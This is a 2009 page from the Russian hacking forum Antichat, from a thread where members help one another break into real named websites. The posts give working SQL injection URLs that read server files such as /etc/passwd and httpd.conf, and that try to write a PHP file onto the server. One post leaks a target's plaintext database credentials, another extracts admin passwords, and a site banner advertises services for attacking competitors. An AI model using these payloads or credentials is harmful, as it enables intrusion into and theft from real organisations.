Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1016 из 1393

1016

Опции темы

Поиск в этой теме

Опции просмотра

#10151

13.11.2009, 20:05

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

[QUOTE=apekoff]

Цитата:

Сообщение от Ins3t

2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

Код:

http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+

DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.php

изучай:

Код:

     http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/access_log')--+
     http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/error_log')--+
     http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd')--+
     http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')--+
     http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/my.cnf')--+
     http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/logrotate.d/proftpd')--+

Последний раз редактировалось Pashkela; 13.11.2009 в 20:09..

#10152

13.11.2009, 20:20

apekoff

Новичок

Регистрация: 12.03.2009

Сообщений: 26

Провел на форуме:
115825

Репутация: 0

Цитата:

http://www.spacefoundation.org/news/story.php
?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'text' from+mysql.user INTO OUTFILE '/home/virtual/site3/fst/var/www/html/111.php'--+

вот как получается правильный путь - но записи нету

,почему?

#10153

13.11.2009, 20:25

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67
/add например http://www.spacefoundation.org/research/TSR07.php?id=-420'+union+select+load_file('/home/virtual/site14/fst/var/www/html/mail/index.php')--+1

Код:

define('SENDSTUDIO_DATABASE_TYPE', 'mysql');
define('SENDSTUDIO_DATABASE_USER', 'webdev');
define('SENDSTUDIO_DATABASE_PASS', 'a50x35sf');
define('SENDSTUDIO_DATABASE_HOST', 'localhost');

Последний раз редактировалось l1ght; 13.11.2009 в 20:33..

#10154

13.11.2009, 20:25

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

Цитата:

Сообщение от apekoff

вот как получается правильный путь - но записи нету

,почему?

может прав нету, не?
ищи папку, где будут права на запись, либо попробуй другим способом

#10155

13.11.2009, 20:29

apekoff

Новичок

Регистрация: 12.03.2009

Сообщений: 26

Провел на форуме:
115825

Репутация: 0

Цитата:

Сообщение от l1ght

it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67

получается путь пральный !
видимо нет прав на запись ...или я не даже не знаю .. идеи ?

Цитата:

Сообщение от jokester

Да

Закончить флудить и как уже сказали искать папку на запись

Да вы батенька - хам
Лайт можно тебя в ПМ, а то джокстер говорит что я флудер , а сам тупо 2 мессаги захирячил ниочем

Последний раз редактировалось apekoff; 13.11.2009 в 20:51..

#10156

13.11.2009, 20:39

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от apekoff

видимо нет прав на запись

Да

Цитата:

Сообщение от apekoff

идеи ?

Закончить флудить и как уже сказали искать папку на запись

#10157

13.11.2009, 21:18

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

apekoff, на тебе диру под запись:

Цитата:

/home/virtual/site3/fst/var/www/html/docs/

гугл всемогущий...или брюс. Похрен впрочем. Лейся.

#10158

13.11.2009, 21:43

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

парни, вот уже наверное за 2 дня десятую скули раскрутил,нашел админку,но пассворд не подходит, вот пример:
http://www.kamal.dk/fokusligenu.php?id=-227+UNION+SELECT+1,2,3,concat(username,0x20,userpa ssword),5,6,7,8,9,10,11,12+from+users--
http://www.kamal.dk/admin

но опять ничего не подошло, посмотрите плиз)

#10159

13.11.2009, 21:46

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

но опять ничего не подошло, посмотрите плиз)

Стоит basic авторизация (т.е. возможно одна пара логин/пароль вписанны в php файл для авторизации через basic (имхо многие так админы делают))

Возможно таблица юзеров от чего то другого

#10160

13.11.2009, 21:50

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

wolmer, я смотрю умные админы пошли) 10 сайтов, 10 разных стран...странно)

Страница 1016 из 1393

1016

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход